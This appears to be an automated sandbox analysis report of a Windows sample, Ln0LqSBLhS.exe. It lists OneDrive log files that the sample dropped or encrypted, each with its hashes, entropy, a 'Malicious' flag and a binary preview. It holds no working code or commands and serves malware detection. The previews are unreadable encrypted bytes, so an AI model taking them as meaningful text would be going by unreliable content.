                                                                                                                                                                                                    SSDEEP:3072:RZPW0oiLlIybbjgBgN3ve9rlJcbnPxJ9Rq/kb1ppXT/YSr75QWOK5wI0sW:O3i6wb7e9rKnPPAkb1ppj/YSrFQWOKtW
                                                                                                                                                                                                    MD5:A49634B54C5EFA2EC22CD1CF1ABE130F
                                                                                                                                                                                                    SHA1:6C4323E63172617E69F29AA766DEC5DBD9F3FC5A
                                                                                                                                                                                                    SHA-256:6500753EF8AB980D342156AC33A26171DF45A4D2A26B409CE3ADE3ED996CFF3C
                                                                                                                                                                                                    SHA-512:92374F3B67A5779440C745AA2717055CE0BBCB3FA665EA99D875D926EB926F05CD287511BA67F3C58C166FAA6EFA10D2299E98194E4BBECC728C018C8B7A791F
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: X.=.p..EFE.9.#.U-..)6..5...O.z...Er.h...]..|.h....T...v.J..\.X!.h....e...M.py.F.....(..l....:.....!...M..1+.5!5Q..[\...u..U7.{?..d.y2.P.9..e.N.R.A2........fS..h.3.......#_..2.$,....KO..../D..|..<O]RQ........i.&h..*..my.P..qV..1.}.-..kI...jq 7..bRH.4<.>...[.g.P..........v..w.-..N.Zf..4.G.~.,{c((.uN.W.4....X..g2...V.......tF..u.%6..O%..I..T....a.N.-Q=...u.O....d.+..L...h.....y.2...(...(...|..&.$.1=V.b..ak...e...b..2......o...... (.....^..Q.......#......|q.u.B..c..+...-G...cE.._.....R;........7..... ....V...f...P..{S|<...`Rq.........|....VO#.l...Pj..LZVY.....d'w..)..8.....).^G.H...Z..G~e......C*..+.,..K.7.U......G...T....{..QSw....T.....g....E...+.J........b....~......N|...E.S.I[...2..$,... ...q..uN....X0,....j........Y.^...&.........~kW...R.h...W..%.t..NAm..)j.n.d......&,1.s..(!h.(....f7i..`..3........A2....EXy.....9..B%.V..0...1.^.'....]g....T.)..\bf.s.F'...,..|T...RB.y.*.gQa...T~.%O.AQC).....`....i..l.........PK.....B..4B2..3Go..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2019-06-27_102023_125c-c90.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):93803
                                                                                                                                                                                                    Entropy (8bit):7.998067150305032
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:1w1JO7RiiZ0CL1i07FLY7/pYB5JzNf2wd0IrpPrPwKxv7TN0tbclm1OdcFMuAiUE:1WiiJCI07FL0/+ZVpvlp97hSAcbFMwyg
                                                                                                                                                                                                    MD5:DACAA1FA57E4D4C9C46B90FEA023DF24
                                                                                                                                                                                                    SHA1:70A7258430AEB39EF029E5A49C55339D2FC17668
                                                                                                                                                                                                    SHA-256:277A6EC0C23C8E8A512716C894B479C9D106A480AF896B0F0F7EECE491C45DAC
                                                                                                                                                                                                    SHA-512:8F19918010CBE4E724F4158A08DF39624FADD5B0F4EA501A06C7461CEC3968BC75EE404CE3D0CF41AF7BD729A366158F3628891C4CCF986F9702CCE9EBA8A9E8
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: c.g...X.....M..'...cY.W.=.o}..ed...5.V`..9v.d.}z.q.c{.u61e.Gz.LOy...<m'..).......!....i0...k..K.....B...v.7R8q...a.\.]W..Q.x...z..K.{.u}....Z..0[....~.....b=%L.*.....\8.nDy....N...W,..&.j.{.".J.a...'v..`..O...)(.qu.B.......^...t-8..(.._u.3.~.0.v/..h.%Q..1.wF.X...}<8X.~.-...d..P.. .2...(......ng...;8...%hLRt....w.'Z........r~~....d.9.$.,...Y9.. ..R,L.. .Z.S.z}.~>Q.T..$G.`a.y,Yd".d.......`.G.@$.&.0.\q.............t(h...u..._.;......S..).x\...n.S.....S9..N..3*~.Qf.l9...;..].CU/.a.~.r&.A.5n........".LX...|.m\.,c 8.1<.P.}.J..............I#.N.>.Z....s...8$;2........o..{........^(....<.B..:..om\.K}N..i....0Z*....=.q.....M.0M..J.y...\..-.P?;..h....e..0...U....$...........UR...."..../.....Q.?/...0.a~.Z..r\.E.I...!A-.0..#...N....)..8...E{5...rM`....,. .......?.)...x3...{.:....E.re\..v]....x<Y..08.....`..0.4...0..q..q..........h....\)YD..e....W.(..!....R...uB..m.k.*D.:.m.@T).......z..`8,.[....>..mo@\....1l.2........E.Z..^s..u...*.&...tQ1...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2019-06-27_172244_4980-3048.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):40413
                                                                                                                                                                                                    Entropy (8bit):7.994545785700356
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:yMOx7gjgTdkZ3xP/E1Taut/4+VEoRbfnQ4d3wis1ZONdwO/FHdDixp0RV:vOZWgIxPsaunQGHs1EN6ON9Dwp0RV
                                                                                                                                                                                                    MD5:D66DB4D944D729321BC9D36CB255D5EE
                                                                                                                                                                                                    SHA1:DD91888DAE04A28441DF04F247445CFBD97701C3
                                                                                                                                                                                                    SHA-256:026A9DBC252FCDEBEC27658B994D46EF43246B488B8E17667655A88585F83A7E
                                                                                                                                                                                                    SHA-512:591CE9792CFDA7A7AEF87535B7FE38CB8FD9840F9F87BCDED4B0F711624683963CED91F769DC804532BE97C25404E9AAFE06A59A189D575B3E3F97F6AD37AD1E
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: Jr=../...t....O....N.k.&._^.J.....m.,.B.7....a..9I..,..^&..E..)ps..s....!R.!u.Y..W,.. ........>.0.8..*G..8WH..D....KRF=.L.....LF.6.0..(..N$.KR.$...H..h.......>.!M..?..G5B....Z..k.....f..~..h...e=..ny^9O:....-DT...r...4...x..w.........c.qo..~U...s.w.@.oW.`.........r...`*.1@...z.......'.,I....b.Y.{#.cs..^.....Jb...,.dM_.i.b!:..?.w/.......yY...{...T|....S..V......2.q....JV[.k.X.l.+CUeA.?Mj..R>.ID.g.'<....'}3.w.,..Ed0#.~..(...=.>..{WY3{,.e.l.h..Z.d;}*..... ..J|....T....N..[...n%"......{Q.._.Zj#...,...k.U"+.x......w...Kf#P.pL0.p.H....,:.T.....s.#WR.cq.....L..x.......0.m.kzn...Q...G..6'.&a.%^..$.E(.vY~...(,t.E9......2ozJ|..G.y..7....X...bad..j.x..!...SU....Yfq.Ou...7x..:....L..B.q.3.h.V*'0......n.|V.s....PB..!9A..;.F.....Z....y...J.M...P.H.G^7.@v....@.w...x.2G......h,..l..rB@..h..]U......\.`..#AF.G......3...4.+.:...m.]<...O.EUv!?.....1./6\..CR..P.-..YNOox].Q.M..|F.%."<.>$l.M'.c.P..5....._....cYT..<.dw..'..}.ID...c...;.kz...\...Y..z).....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Install_2020-07-23_165322_5816-5812.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):38737
                                                                                                                                                                                                    Entropy (8bit):7.995025645745949
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:GX8V9djtnYsW4iPjfWv0wqNIPpSx+9Jdh7uSrGIRLga+:Q8VXcPjfAWNEM+7dh7PFBd+
                                                                                                                                                                                                    MD5:FD8077B8FF66E1D5C09BC2A98A360202
                                                                                                                                                                                                    SHA1:EEC94AB3068F33B98A75575E0CD009EC4943F59D
                                                                                                                                                                                                    SHA-256:3E7A9A1D037477C9E8A95DFBE8E78984C84EA394174F2BE7264DBE7DC10457C8
                                                                                                                                                                                                    SHA-512:38D6CBC802F6C629984C218EDD3C3D936C1F1936FC1AF1028FD89FB03B8F577FE263A8745EB8E73258D0E0D4DB5DCB548D10CC91502E9E7ED8540E11CF6F4B61
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .w.Lc.>..(.cq.;*..Le...Q7....7...x4...J.c3..y.....t.4 ..z.P.|..m.9..Fc.N D.hS..S.lp}.w..?..Q...(..|.d./qh.];..0K.w...dtg.E..;.F.b.F..}[..6"...:y..5`......./j.}).(...3.......,@...F..2.....S.r..P).Tu.I.`...Z?/`....U.R].(a.23....d!_...X.^j...3xn.s{Gg.V...v~(J...zLGn.z....e*.t.r.}{>...;._.l..b..b....L..l...........)..b).'..PA.S....."..+...@...|..."Z6.6..'......Q.....>......B.?.#..g..6.z.kS....g..~.....lu.a..H.ah9"}w..G.:..s1tR.T.......5.4.;..9/8...7l.o.....W.Hf..t. ....~.X?..`.W2.6...%.U..I:D_..Q..A-...Z+.k..8w.................U7.../..rh....xlX.3....g...2^...........2/.^#.7v......,...7."vA.....rX.......s...w..3.X......<...5u.IB.....F...1.....F- {.g..]]=t..<$...O.."]....j7$.gS.#R......n...1Oy.e..I....~t...s.kQ..h..4..}rjr7...{.{...WBoLL0`4..;...u...&.|.]W.......|.O</"...7xk*`.....Y.......5Vsh.L<f....t...L.S.`.j1.......\....2.,.X.....I..c.r..Oa....e.{j.mr.2k..~....7-=...0.._G..9C..[J/....;V.*..V....)7..8.Sex.7........Iq=..t.Q..r..9
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-07-27_071441_17bc-17b8.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):94627
                                                                                                                                                                                                    Entropy (8bit):7.998496921508321
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:efgP1OTpyXyZTy5y3JYqRCqn2Dm/t3wsWGucFHELydmPgWWQyk54Rp9L:eIPkTpjy0zCvDe3NF4MmPdtC3l
                                                                                                                                                                                                    MD5:238C4D3B11EC866DBCFBBA07C1DE8AD2
                                                                                                                                                                                                    SHA1:9402E2754F1D3A52088E54E0010C5DF6650CA629
                                                                                                                                                                                                    SHA-256:EB3015720B38F091700A8757CF5639819F9445359EEA7E2D45D0CC4FF52EE473
                                                                                                                                                                                                    SHA-512:79F28610AD4FF2E55B99915459B4ECB08ED7FC5F22561974DDB0C2C628A8F89629B9E4DDEEB692E33698CF8FC5041C5AF8C3765BA2FCFA65ACB3141C99F99CD5
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .mq.l...O......f.9.d.%....N?9..Ny......e...........;G. .4..2`.....:..Y%..x7EEz....Kh%...z. .Z.C......;(_..g...5......P..U..m..d.M.Yk1QH..W..L...d..y....:.t...u..,.|.E;.q..V2.!..Ho-1=~9..p{...z.p...uLB.../.................@...X.q....;.....n.|.Y.%....5).......$.ik..x.S2.........0d..$P.!...?].1..h.........'.x....e. ..=....wc.~P.g...}...2o`.k@../.........9.]..w.W.mw..U....U...u._<.V...;Oks/..5<.....z.*.A..........%$&L..h.N.bi......=dZ..T...l..z.f..{}d..nRP..Z.@2..PRK=.f.....g.....`.]..p7...z........n\.?b.y$...X..Cd....X.*m7Y..V....M..........y...P)?.........Yp"_*}Z.....&a._Q...:.xW..v&a;L#...%._...w...L....G..."..gMd .........h...+R....Y......3JD........\/.5w2..:.xd....N.E..i.Q!.~...yd..3..j.......F..;.\...i..... ..1..0n`.<.!.E...".&...Y&..V}...RK2.s.V....p..q.+..7.)k7?R..#......4!.D._..m.....9w.y...1....c.S..RcR.`|.......C.....{.t.I.O0.%w......p#.f..G.K..}Y -&.6{...I...L..e.5.....R2+.50%b.....~.....j.@.4.4.3...d.-...Rl.{8...0.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2020-09-30_080200_1598-1674.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):91923
                                                                                                                                                                                                    Entropy (8bit):7.997815097207454
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:R8EV0B3o84EekRfgstvzKMaFIC2GFWcFABxfCZnoixQUlmpXMB4D:nCkUgWotWc2BNun9KUoaB4D
                                                                                                                                                                                                    MD5:6FEBCC208095A8BB9E660AE5A081E050
                                                                                                                                                                                                    SHA1:A670A50C425F774E320C30F61A7F49CB66502C9B
                                                                                                                                                                                                    SHA-256:CC8F636DCEA674D51F81EF9A05E99DCE7D1CDA663E65459402FF6328A31D564C
                                                                                                                                                                                                    SHA-512:1A6491A049CD1B284C0F67E4CD224527A3CA6729D6548AC9722B30AA999639DA14FAF8F272EA6974151E57DBC335DAA389660C061FE0C0904E2FDB9DE382B7C7
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: a...9a..5(..a..E..#OKp...}.k..H...{...W.q.....Awb.tJ.;hr..[.%Z{.".=.DI..D....6.[..:...)d..%.!I..Qr.y.+....k#.......{w.....<..*....`....r.[...P.bi...b...`^.=.Fa15....B...(e..Y2R.u.._...j6.....$^.P.a.B/.W^..j.F.&a.....Mu<C...ar...5...W]PRi..b..~~..~._..._Va.d..b\...".{..!......6..pc@.S.l..9g.t.$...i...M.1.A.bVs...p..i..(..x.:. .9..t..@.YS.9E.}..............H..6....t.......=_.A;g.N...|../=.t..Y.b.$.....A...(...-.d..x.#YJ..S.....V)1....m.....r..z"..Y.]..4..e...=)...3OY.!...W.u.-;\.D.3.X..O%9v.G..n..&h...0j.{B..........+0..`.kz....=.7......M../...k...Y..!)....X. J...g)...6...}g....e)..PfQ.wK0.6.3#..R}[./.....f.J..N.....bI....w....P)Q._.R..=.^.o.....f^*.H.B.&.+Z..;..F.r../.5X[.g..6j.....Y.(.J...z.<.X...k%?....x%...8m:y@.....M*....Q..-..Oe..07~....~.c.....W,...'pP....TY.z"...pf..6..*...g.g.d..Bh.WT....E..4........./)....j.eL....Mz"e.n..].s..f.6..d!......&.;..Z.....A....(3..f......@L.V..;.......&.........}2k.A.)..M....[...-v~DG).X.:w..)....o...>k.B..z..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-07-27_071441_12fc-160c.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):111321
                                                                                                                                                                                                    Entropy (8bit):7.998163437082364
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:CcH7mmAQweaJdZg6LEz/HBP/mpafM+EB/oxxqQCHV:CcH7mxzdZgQWd6UMGqQ8
                                                                                                                                                                                                    MD5:AD161A9A6F9D471D5C4EE05F93C2AC1E
                                                                                                                                                                                                    SHA1:3E38D6B02795B4804C36BFC3A8665474CE03D3AA
                                                                                                                                                                                                    SHA-256:0D00F219E3CC4FFE967F8B1A1DF7EE5FF44794DAFBF433A635151719B1048A9D
                                                                                                                                                                                                    SHA-512:2191084267EFD0E2DEDFF5D146FEA63B83F2907DB288B13E68AE1488CF62686A265C71C5314577F2FD9B893208E114C33D09183746693940B5C6669332FADBD5
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..d@.vs...=....n#.=..Q..b.9.......>x`c.....0.z.....c@.C....a..j7.."\4.R.......?s..(8e...g.}...X%mu.w.<.....g9.T..h....9+.=..=..._\.....T).......wL...;..n...h...'..j../..3/..a8Teitw..7Ama..9...Ib...._....h)k.?.....Q.t.R..C..de2s.U..>.!.'...DY....B.E..h..k.R.....H.....X.58......p..}.ab..g.`...0^^oQ.p-..@..=b.......%]+m;.{.M.^.-.Q.M..........P!.x.[..b....1...../q...%..S.BQ.f;.l\..'...o+.L.c.;-....y/..3e3e.p........#.=.d(.A.'0N.)-3.{......[.M.^...y@.L)......d|..K./os|..5)...0..~a.X.<>..`r.%bS..M.."....V.O..*...T6Q4...>..ox.mB.m. ..n.08UKb..S....G&...i..'.....I..C...../h.o..E.&.o.dfVY.d*lp_..,.r.....vm...._..c.$.h.}6...*..Z.K_...kX:|_..1R.yx....}6.D...T.HA.~.-.1..6......:...=,..kq....x.:.......W.....kd.....J..`r.'.,.....P...P>..)<...M.DNH..J.....>.d.!.jzu4...#..4..o>t=5c.X&=.$5..T...A.u...*... ..$..&OW.y.+:]Y...G......%/...f..c.u._..hs...{.y..$2..k..H..`...iC#U.S......z..u......}.....jA\A....4n .C.5.......N.v....b..w........7..P..........^.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2020-09-30_080200_fb8-16ac.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:DOS executable (COM, 0x8C-variant)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):93961
                                                                                                                                                                                                    Entropy (8bit):7.997993241206677
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:cfMDxj6sOZukuoWdZV4VtuOO/6V50gyDV8xxAs2qwp8v+E8//66YzQdG/c3WqmeH:cyj5OcBhAXb+IyglAs2/+v+E8/izzQ1b
                                                                                                                                                                                                    MD5:86392851EDD2F4FFD1BFFC1C306F5AF5
                                                                                                                                                                                                    SHA1:1F2C947193A71C489D08CFC9F4AAA7297A3B2911
                                                                                                                                                                                                    SHA-256:02EEBE2A45337F166A6659FE3CC465024F86557A1F4411F4780AFE63A00280C3
                                                                                                                                                                                                    SHA-512:E09FADE1A8EDFDA762AA0877DDF6EBD919ACAF35C71A254F64398237A68801683E508A1EB2DDEB687B7BB9F9A2A88A4414888A751CE3B4B5825B1629991B4DDB
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..93ee.n..w.E[s...?.h...%.O..@.....S.Uhl....1i@K.E{b.XW.-.ya..k.o..m...O.g....s......I..S}..=.#...+r. ^).....d..w.......-.........6.....y....:Q.~.9..2.s#zf.f{.b.K..VG.pl.4%3.......4...V..D....Gz..q.${.f..}n}..K.......#<..D..-m.!...-.<|.3.>.I./$.`...u.....^=p.....c$)(,...X......,.......o..!\(B...L{.[...s...bB.PV..i. .!.2.Y..........s.gZ3.D..8#..(...]d...9i.F.{.pR...m..y..#.F......4w.;y3(...JB...B...S...xqF. ..LA..8x5.....LI.h....'x6...... *.m!.~s..4...'...8.....f.......,G#+.......].......n....*.o..+x*.[~..S.....q..iL.J..[.."..cG.}....H/..\.{.Tr..,?........$.......Q~...C....).:.p.*..!.@..+_..v.^....$..cU<o..R."Z.*I.Q.9...+.8.&.U.....y......?.0.d....W(...~..,0.DV....."\.Q.D..6...?.....7iG..o0.v.X.....z..{6..P5....O.G.Y.^bo..Dq5.......'P......!.P....{(....=..a3H.^.:...././...*:......:}n<j..r$...V=...)wYj...V8.B.Zz&...M.l...R..a.#1-....!.5..&.qQja.u........Pl..-!G..c..R.\A....H.q..U.T2........V..c2N4...h.)..... .6...%.R@...Z.]d.....U.&+...|.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-07-27_071441_bc8-bd0.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):93301
                                                                                                                                                                                                    Entropy (8bit):7.997954748754149
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:gbPV9UPKBJgjnm+ruW+DoH1kZ3kYiLqhUkHdV4QgGJYIuezuA8Gbx+8XY3CZstED:grV9UPKBJmdaUVkpk1LCHdV4QLJHEA8k
                                                                                                                                                                                                    MD5:ABBE14F55E67E5917DAB3CF3EA370E67
                                                                                                                                                                                                    SHA1:EA29D9F424596AEA87B32C46F16786F9111AE288
                                                                                                                                                                                                    SHA-256:EAA52226D4881D4D65041747DE77C68B65D12E2C342BF6AB918F3618B9895D2B
                                                                                                                                                                                                    SHA-512:D39FCC4791EB9528CE03459CBDE6C53F2BA18117A9038307ACEBB1FD0423F5D462B07B168F25333E709F2B7F1F54E974C7E3FA4A03D2948ECE5A43B2EC9FCE06
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .|8NK....7.Y.......I..b\9l3.....w.#3.m..[.F...d.@c.....Fj.V..V..>.......N.=...K..B..FP..L..r.r...Gb..dY1..(.vo..K..Qp..........S......U..o.......V..6...a.........fH..........h.O....K...O..G.mS$g..#K.J...3...)!..n..R.9.c4.\.....A.A.G.}..WEe....U....'....Q*.vV.r..JS.!....%j.pO.R#.=.!..bv1.....%.q. .f.7*".U_.]...Vg../.4.~...*.-.."-..-.p....@....K..a.@_....X..W.J....ts......W..N-..[.......'@.Q.+...U.%F.=..(h~zUB..~..n........E..\R..v.M....x."I.)3...L..U....m..45....rh..%_..m.|.WvA.2H....h.R........>..2)...Dr.*e.3z...$.Y^.)Jr..%<}.,.C........1j..'....;.....24:.HVe"=uD..w..z../..K.....l.~....|...B~...u.Ss.rL.,/Y..l..x]T=]M3...q..A#w.Z..".G.vJ7..=..O.V`.-1....5...S.\d2...ry.!.p.l....!....r...m~.W.q...0.....c..7.v..Pn`y.t.o.R......$T...b.5......8.S+.;.T...-..+..%..<.zp..].V.y..l.,.r...&r......%.|..v.../.M...c.1.......k.8...4F...)p.u..D...._..1..WQa.U.UUW...vPn.ZcW1...(/<......R._(..~1.>|.5...l*.KO....btg,...`...MkI..u.o..% .HV.@..i.uG....Y..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2020-09-30_080159_c40-12d4.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):93687
                                                                                                                                                                                                    Entropy (8bit):7.997970805913656
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:33gDpgMv3Gfvfvqb9rQk1Jqs1TAjs/y8HosXI3boBc9THAt9u19SRcVemdDFZBT:33gDuUGfvfvq5qs1TA5nSKoBwH0OteSX
                                                                                                                                                                                                    MD5:4C20F1EEDBF9CFEB503D95A00EA03B07
                                                                                                                                                                                                    SHA1:4483392DCE812EE3852FCA813BB4A16E1A844746
                                                                                                                                                                                                    SHA-256:399763283D42189B9A28B4FD7904041ACF55365066B42287B3F45A45CCABA639
                                                                                                                                                                                                    SHA-512:CBD9AA9420C644BE549E1D05EF3DEF3D626D2043A626F0F4BFB3EB0D24C3DEED1F496A559592B30D83C98F9A0B58FFB9A7889128708F6A2A7C3F03199FF82F29
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...5.....6tU..pKS*G...+..%.....n..(.8. .Q.c..a|n#%S9.d...`B...&.o...b.Dz.....f.p..Gd.jw".....u........I..4.C.Q{)...Kz;4.0.u.S.R.Lg2a.\.(.u....my....[ .g..dQ....d.<.d....Dk.-....xaU.%.a.....C.H.t./.5.b..d.".....Q..iD_E.A..K...L.}.cD0.x..m..a.~.b.J.2....,a.AN..s.....L..-.m{..6.."V..g.R.;...W...a....TI....x+.z!B.......n/Zb..f.J...L$.,.Xw8.Z.Jj..+.Tt..Jbb+...F D.....F%...N..y....%.U.q.@?..O..M.@(...).HQmI..c|.....?.....]|Km2.}.h...yL....WP.8....B.dh.l.....S..n.../.lo.&...SI.nx.w.FD.&e~j.O.&.XbT...+.<.P.2.....R.....;~).0...9...A.@.'.?.;#..XsQ..-&?qn.......N......R...r.e...b......|.......+.... 3..OA....0........c..Ga..y7+..m.v...T...2/\.k.....d..*.*. }Nkt.S.9.....*......K[kC....:.?(...v.l..l[F.m.$R...)...H.U.Q.E.....l(y....!mD.....V0.u<..W..N_...D.|.r`...U\L...m(;....i.)m.DS9Ls.F.{.{.x..g#..P...K..;.{T<T..*....I....n..Z.).'^..q.%.K ...eQ.1J....c.(c?S...f.....%..........n.~....|...ck.M8.|.}..4.z.D6.l0...(<d..$...i}.../..p..]..#&]yb...%...rh7s...q.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2019-06-27_102115_1a80-1aa8.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8875
                                                                                                                                                                                                    Entropy (8bit):7.977622873006239
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:SNfXThSYhMltT+IJLWt6bnPtnicL9ZLGZCx6QLHqly/j:SBX8Yhy+iWt6bPtniex6GZj
                                                                                                                                                                                                    MD5:9536565C77A39089AF0558D6CA5A6D4F
                                                                                                                                                                                                    SHA1:B90941EA1E2FF2AEA2442E4930B2D75174A3FA93
                                                                                                                                                                                                    SHA-256:9BEA53B427FBB4FFD4710AA00E19B97CAB65FB23E5A6C4791F33195F96448364
                                                                                                                                                                                                    SHA-512:98CBC8A52D9DD2DF88DD9E4E9576E810705FDF450FDA645408D5A298CDB4F0A770C8FE54949BEE3D6B6F112EDEE31C52509057A5991D322AA54B5ED9D89B8710
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: z..o..Oh#.V.....Yt..zQ.....FQ....y...L.6.q..k...%.l... Z."..z......??.x?.z)..Y...........1.g..<.....)s_...yV.I+.l..Z.Y....^.9v...Fr.........d.#.....&...*.D.|J^.(fz'.z...Q.g..r..0MP..B.:E...+.7J....S|.....>s..>.........K..+W..,.3b.\j."=....!..$D.Kju.I.q..[.j..B.....[U.._..gI.........s",...........}..)=.W']\]....Xv2......c...T....*B.8..?.R.l...eU-......Lt3... ..@a>..FK.;.3$..Yn..uVu.o1wEIsn.!..X.J..F....~'.Qb....v.uN./.A...y.E.j.(d.f{.n......mn...8.o...p....l..HP.9...t..@..Z.......QU.K..."..h..Q..&...0F..{8E..'51.......H......>i..d.r...W.e.-]..S...}......qof$.H........-.H.I.s&ha..k{...|.+.^H.f.*....h.....z\dg....0@T1<..=...}.L..D..MHL....a.(z8.N....n.}"....s/.W..........Py...H.t...F...M.*.9t...0/s...,........x.).e.&E..fn\..*X3.%.....%.=J.....{.......bv2)N,......KY..!\x.@...*@..N....Qu..i......U.=M.U..a....&.6S...r..`..,.<...o...]..n...9?h.6..o-.-.h...2Iz...J.0....$...3....b...}.2k....O.ww.. hd..#>..a.....d..+h.0..../oy....(..G.5&..{......8..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2019-06-27_102202_930-91c.log
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):15773
                                                                                                                                                                                                    Entropy (8bit):7.988382468386467
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:c6t7JTedNOxJBHO6ssz6H7MykKm/9D7CupeuHZYKn+JhuS:d7JPxJBnzRcu6ES
                                                                                                                                                                                                    MD5:76876804090F872D462ECC53DEAE9B80
                                                                                                                                                                                                    SHA1:6E35CB6F399F0A80E4FC0C986C4898B7E8B057DD
                                                                                                                                                                                                    SHA-256:B7EA6F97741178077A22A4211D2860F910017C9EDE2F8875EC23B5A57050A613
                                                                                                                                                                                                    SHA-512:3E54AB890C17B5B3204E6FA112FD3DD4971742F34DE07BD53D796590CEC3654145AB6FF41B8E468AD78AB3F706F1FD20C08ACD505EA863C83FB6CEB66B0F0E36
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
